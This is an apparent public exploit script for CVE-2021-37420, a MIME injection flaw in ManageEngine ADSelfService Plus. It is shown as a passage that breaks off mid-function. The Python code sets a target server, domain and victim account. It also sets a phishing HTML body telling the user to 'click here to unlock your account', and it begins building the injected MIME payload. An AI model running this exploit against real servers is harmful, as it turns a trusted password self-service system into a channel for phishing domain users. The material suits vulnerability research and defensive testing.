# # STM Cyber R&D # https://blog.stmcyber.com # # Exploit Title: ManageEngine ADSelfService Plus - E-mail MIME injection in /RestAPI/PasswordSelfServiceAPI endpoint # Exploit Author: Krzysztof Andrusiak, Marcin Ogorzelski # Vendor Homepage: https://www.manageengine.com/ # Software Link: https://www.manageengine.com/products/self-service-password/download.html # Version: < 6112 # Tested on: Windows Server 2019 # CVE: CVE-2021-37420 import requests URL = "http://192.168.100.102:8888" # ADSSP server DOMAIN = "ALPHACORP.LOCAL" # Domain name USERNAME = "victim" # AD username (e-mail recipient) HTML_CONTENT = f"
Hello {USERNAME},
click here to unlock your account.
Best regards,
Administrator
" # Mail content def get_payload_html(html): payload = "" payload += 'Content-Type: text/html;charset=UTF-8\n' payload += 'Content-Transfer-Encoding: 7bit\n' payload += '\n' payload += html.replace('\r', '').replace('\n', '